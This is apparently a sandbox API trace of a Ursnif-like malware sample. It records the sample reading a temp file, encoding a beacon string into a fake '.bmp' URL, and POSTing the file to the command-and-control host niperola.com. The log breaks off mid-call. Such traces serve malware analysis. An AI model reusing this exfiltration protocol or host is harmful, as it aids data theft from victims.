[0251.799] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetQueryOptionA") returned 0x7ff96b0a3cc0 [0251.799] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x7c3f5e0, lpdwBufferLength=0x7c3f610 | out: lpBuffer=0x7c3f5e0, lpdwBufferLength=0x7c3f610) returned 1 [0251.800] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetSetOptionA") returned 0x7ff96b0b7f00 [0251.800] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x7c3f5e0, dwBufferLength=0x4) returned 1 [0251.800] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x7c3f638, dwBufferLength=0x4) returned 1 [0251.800] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x7c3f638, dwBufferLength=0x4) returned 1 [0251.800] ResetEvent (hEvent=0x930) returned 1 [0251.800] ResetEvent (hEvent=0xa0c) returned 1 [0251.801] GetProcAddress (hModule=0x7ff96b080000, lpProcName="HttpSendRequestA") returned 0x7ff96b083330 [0251.801] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0 [0251.808] GetLastError () returned 0x3e5 [0251.808] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7c3f530*=0x930, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0252.671] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x7c3f588 | out: ppstm=0x7c3f588*=0xd37beb0) returned 0x0 [0252.672] ResetEvent (hEvent=0x930) returned 1 [0252.673] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetReadFile") returned 0x7ff96b0a3350 [0252.673] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x79c6940, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x7c3f610 | out: lpBuffer=0x79c6940*, lpdwNumberOfBytesRead=0x7c3f610*=0x0) returned 1 [0252.673] GetProcAddress (hModule=0x7ff96b080000, lpProcName="HttpQueryInfoA") returned 0x7ff96b0b7140 [0252.673] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x7c3f620, lpdwBufferLength=0x7c3f580, lpdwIndex=0x7c3f628*=0x0 | out: lpBuffer=0x7c3f620*, lpdwBufferLength=0x7c3f580*=0x4, lpdwIndex=0x7c3f628*=0x0) returned 1 [0252.673] IStream:Stat (in: This=0xd37beb0, pstatstg=0x7c3f5a0, grfStatFlag=0x1 | out: pstatstg=0x7c3f5a0) returned 0x0 [0252.673] IUnknown:Release (This=0xd37beb0) returned 0x0 [0252.673] SetEvent (hEvent=0x930) returned 1 [0252.673] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7c3f5c0*=0xa0c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0252.673] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x74ada7c [0252.674] GetProcAddress (hModule=0x7ff96b080000, lpProcName="InternetCloseHandle") returned 0x7ff96b0de110 [0252.674] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0252.674] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x74ada7c [0252.674] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0252.674] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x74ada7c [0252.674] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0252.674] CloseHandle (hObject=0x930) returned 1 [0252.674] CloseHandle (hObject=0xa0c) returned 1 [0252.674] CallNamedPipeA (in: lpNamedPipeName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}", lpInBuffer=0x7aae480, nInBufferSize=0xc, lpOutBuffer=0x7c3f790, nOutBufferSize=0xc, lpBytesRead=0x7c3f7e0, nTimeOut=0x1 | out: lpOutBuffer=0x7c3f790, lpBytesRead=0x7c3f7e0) returned 1 [0252.676] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x2710) returned 0x102 [0262.679] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Files", phkResult=0x7c3f7c0 | out: phkResult=0x7c3f7c0*=0x328) returned 0x0 [0262.680] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegEnumValueA") returned 0x7ff976fb0f00 [0262.680] RegEnumValueA (in: hKey=0x328, dwIndex=0x0, lpValueName=0x79ce7b0, lpcchValueName=0x7c3f7b8, lpReserved=0x0, lpType=0x7c3f7bc, lpData=0x79ce6a0, lpcbData=0x7c3f7b0 | out: lpValueName="2A15B805C2DE35470F", lpcchValueName=0x7c3f7b8, lpType=0x7c3f7bc, lpData=0x79ce6a0, lpcbData=0x7c3f7b0) returned 0x0 [0262.680] GetTickCount () returned 0x28217 [0262.680] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\2314.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x74f77b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x182c [0262.681] wsprintfA (in: param_1=0x7aaff80, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}") returned 38 [0262.681] lstrlenA (lpString="Local\\") returned 6 [0262.681] lstrcpyA (in: lpString1=0x7aae530, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0262.681] lstrcatA (in: lpString1="Local\\", lpString2="{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}" | out: lpString1="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}") returned="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}" [0262.681] GetFileSize (in: hFile=0x182c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa1 [0262.681] CreateFileMappingA (hFile=0x182c, lpFileMappingAttributes=0x74f77b0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa1, lpName="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}") returned 0x930 [0262.681] lstrlenA (lpString="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}") returned 44 [0262.681] lstrcpyA (in: lpString1=0x7c3f654, lpString2="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}" | out: lpString1="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}") returned="Local\\{0A4739E2-E18A-CCA6-BBDE-A5C01FF2A9F4}" [0262.681] CloseHandle (hObject=0x182c) returned 1 [0262.681] MapViewOfFile (hFileMappingObject=0x930, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa1) returned 0x260000 [0262.683] lstrlenA (lpString="2A15B805C2DE35470F") returned 18 [0262.683] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin") returned 45 [0262.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0262.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin", cchWideChar=45, lpMultiByteStr=0x7aaff80, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin½", lpUsedDefaultChar=0x0) returned 45 [0262.683] PathFindFileNameA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin") returned="2314.bin" [0262.683] wsprintfA (in: param_1=0x7aaeab0, param_2="version=%u&soft=1&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&guid=%08x%08x%08x%08x" | out: param_1="version=300018&soft=1&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&type=15&name=2314.bin&guid=48b8f0f31f41d614be13f8bf91182f41") returned 137 [0262.683] lstrlenA (lpString="niperola.com") returned 12 [0262.684] lstrlenA (lpString="%s=%s&") returned 6 [0262.684] sprintf (in: _Dest=0x7aae550, _Format="%s=%s&" | out: _Dest="gtci=pjnsh&") returned 11 [0262.684] lstrlenA (lpString="gtci=pjnsh&") returned 11 [0262.684] lstrlenA (lpString="version=300018&soft=1&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&type=15&name=2314.bin&guid=48b8f0f31f41d614be13f8bf91182f41") returned 137 [0262.684] strcpy (in: _Dest=0x7aae570, _Source="gtci=pjnsh&" | out: _Dest="gtci=pjnsh&") returned="gtci=pjnsh&" [0262.684] lstrcatA (in: lpString1="gtci=pjnsh&", lpString2="version=300018&soft=1&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&type=15&name=2314.bin&guid=48b8f0f31f41d614be13f8bf91182f41" | out: lpString1="gtci=pjnsh&version=300018&soft=1&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&type=15&name=2314.bin&guid=48b8f0f31f41d614be13f8bf91182f41") returned="gtci=pjnsh&version=300018&soft=1&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&type=15&name=2314.bin&guid=48b8f0f31f41d614be13f8bf91182f41" [0262.684] lstrlenA (lpString="gtci=pjnsh&version=300018&soft=1&user=c5449c7a8bfcc0923b720af430d5cede&server=12&id=1000&type=15&name=2314.bin&guid=48b8f0f31f41d614be13f8bf91182f41") returned 148 [0262.684] StrTrimA (in: psz="Sdr0veeuxIs423csTnd8mVY43F4QywcWFq+Fq4udNXnLEI25yYbo8vUXULdIWHIiDOgCDHKlSdf3B7HpHHGg3GOf8WqKrA6TIQoZxKGHkt3LMqIHtwgl+MJVT34/7RorrQrI0VAN4ZHJmhdykJRQp3JPz37jXOoN9d1blegmH9QzEoevwxCrl6nnHi6TCdygympmFY8i/z1zbuDNd+ho8+==\n\r", pszTrimChars="\r\n=" | out: psz="Sdr0veeuxIs423csTnd8mVY43F4QywcWFq+Fq4udNXnLEI25yYbo8vUXULdIWHIiDOgCDHKlSdf3B7HpHHGg3GOf8WqKrA6TIQoZxKGHkt3LMqIHtwgl+MJVT34/7RorrQrI0VAN4ZHJmhdykJRQp3JPz37jXOoN9d1blegmH9QzEoevwxCrl6nnHi6TCdygympmFY8i/z1zbuDNd+ho8+") returned 1 [0262.684] lstrlenA (lpString="Sdr0veeuxIs423csTnd8mVY43F4QywcWFq+Fq4udNXnLEI25yYbo8vUXULdIWHIiDOgCDHKlSdf3B7HpHHGg3GOf8WqKrA6TIQoZxKGHkt3LMqIHtwgl+MJVT34/7RorrQrI0VAN4ZHJmhdykJRQp3JPz37jXOoN9d1blegmH9QzEoevwxCrl6nnHi6TCdygympmFY8i/z1zbuDNd+ho8+") returned 214 [0262.684] _snprintf (in: _Dest=0x79c8ad2, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0262.684] _snprintf (in: _Dest=0x79c8b26, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0262.684] _snprintf (in: _Dest=0x79c8b2f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0262.684] _snprintf (in: _Dest=0x79c8b7e, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0262.684] _snprintf (in: _Dest=0x79c8b89, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0262.684] _snprintf (in: _Dest=0x79c8b8f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0262.684] lstrlenA (lpString="Sdr0veeuxIs423csTnd8mVY43F4QywcWFq_2BFq4udNXnLEI25yYbo8vUXULdIWHIiDOgCDHKlSdf3B7HpHHGg3GOf8WqKrA6TIQoZxKGHkt3LMqIHtwgl_2BMJVT34_2F7RorrQrI0VAN4ZHJmhdykJRQp3JPz37jXOoN9d1blegmH9QzEoevwxCrl6nnHi6TCdygympmFY8i_2Fz1zbuDNd_2Bho8_2B") returned 226 [0262.685] StrTrimA (in: psz="Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B", pszTrimChars="\r\n" | out: psz="Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B") returned 0 [0262.685] lstrlenA (lpString="/images/") returned 8 [0262.685] lstrlenA (lpString="Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B") returned 241 [0262.685] lstrcpyA (in: lpString1=0x79ce480, lpString2="/images/" | out: lpString1="/images/") returned="/images/" [0262.685] lstrcatA (in: lpString1="/images/", lpString2="Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B" | out: lpString1="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B") returned="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B" [0262.685] lstrcpyA (in: lpString1=0x79cf7a0, lpString2=".bmp" | out: lpString1=".bmp") returned=".bmp" [0262.685] lstrcpyA (in: lpString1=0x79b1400, lpString2="niperola.com" | out: lpString1="niperola.com") returned="niperola.com" [0262.685] lstrcatA (in: lpString1="niperola.com", lpString2="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B" | out: lpString1="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B") returned="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B" [0262.685] lstrcatA (in: lpString1="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B", lpString2=".bmp" | out: lpString1="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp") returned="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp" [0262.686] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x182c [0262.686] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x12c4 [0262.686] wsprintfA (in: param_1=0x7c3f490, param_2="Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"" | out: param_1="Content-Disposition: form-data; name=\"upload_file\"; filename=\"2314.bin\"") returned 71 [0262.686] lstrlenA (lpString="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp") returned 265 [0262.686] lstrcpyA (in: lpString1=0x7aae530, lpString2="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp" | out: lpString1="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp") returned="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp" [0262.686] StrChrA (lpStart="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp", wMatch=0x2f) returned="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp" [0262.686] StrChrA (lpStart="niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp", wMatch=0x3f) returned 0x0 [0262.686] lstrlenA (lpString="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp") returned 253 [0262.686] InternetCanonicalizeUrlA (in: lpszUrl="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp", lpszBuffer=0x79c8960, lpdwBufferLength=0x7c3f360, dwFlags=0x0 | out: lpszBuffer="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp", lpdwBufferLength=0x7c3f360) returned 1 [0262.686] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0262.686] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x74ada7c) returned 0x0 [0262.686] ResetEvent (hEvent=0x182c) returned 1 [0262.686] InternetConnectA (hInternet=0xcc0004, lpszServerName="niperola.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x7aaf380) returned 0xcc0008 [0262.686] SetEvent (hEvent=0x182c) returned 1 [0262.686] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84c03180, dwContext=0x7aaf380) returned 0xcc000c [0262.687] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x7c3f330, lpdwBufferLength=0x7c3f360 | out: lpBuffer=0x7c3f330, lpdwBufferLength=0x7c3f360) returned 1 [0262.687] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x7c3f330, dwBufferLength=0x4) returned 1 [0262.687] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x7c3f388, dwBufferLength=0x4) returned 1 [0262.687] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x7c3f388, dwBufferLength=0x4) returned 1 [0262.687] GetTickCount () returned 0x28226 [0262.687] wsprintfA (in: param_1=0x7c3f3a8, param_2="--------------------------%04x%04x%04x" | out: param_1="--------------------------1152aa61152aa61152aa6") returned 47 [0262.687] wsprintfA (in: param_1=0x7c3f420, param_2="Content-Type: multipart/form-data; boundary=%s" | out: param_1="Content-Type: multipart/form-data; boundary=--------------------------1152aa61152aa61152aa6") returned 91 [0262.687] wsprintfA (in: param_1=0x7c3f3e0, param_2="\r\n--%s--\r\n" | out: param_1="\r\n----------------------------1152aa61152aa61152aa6--\r\n") returned 55 [0262.687] lstrlenA (lpString="\r\n----------------------------1152aa61152aa61152aa6--\r\n") returned 55 [0262.687] lstrlenA (lpString="Content-Type: multipart/form-data; boundary=--------------------------1152aa61152aa61152aa6") returned 91 [0262.688] GetProcAddress (hModule=0x7ff96b080000, lpProcName="HttpAddRequestHeadersA") returned 0x7ff96b0ef3e0 [0262.688] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=--------------------------1152aa61152aa61152aa6", dwHeadersLength=0x5b, dwModifiers=0x20000000) returned 1 [0262.688] lstrlenA (lpString="Content-Disposition: form-data; name=\"upload_file\"; filename=\"2314.bin\"") returned 71 [0262.688] wsprintfA (in: param_1=0x79c8960, param_2="--%s\r\n%s\r\n%s\r\n\r\n" | out: param_1="----------------------------1152aa61152aa61152aa6\r\nContent-Disposition: form-data; name=\"upload_file\"; filename=\"2314.bin\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 166 [0262.688] ResetEvent (hEvent=0x182c) returned 1 [0262.688] ResetEvent (hEvent=0x12c4) returned 1 [0262.688] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x79c8960, dwOptionalLength=0x18d) returned 0 [0262.689] GetLastError () returned 0x3e5 [0262.689] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7c3f5a0*=0x182c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0262.917] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x7c3f600, lpdwBufferLength=0x7c3f658, lpdwIndex=0x7c3f650*=0x0 | out: lpBuffer=0x7c3f600*, lpdwBufferLength=0x7c3f658*=0x4, lpdwIndex=0x7c3f650*=0x0) returned 1 [0262.917] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7c3f570*=0x12c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0262.917] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x74ada7c [0262.917] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0262.917] InternetSetStatusCallbackA 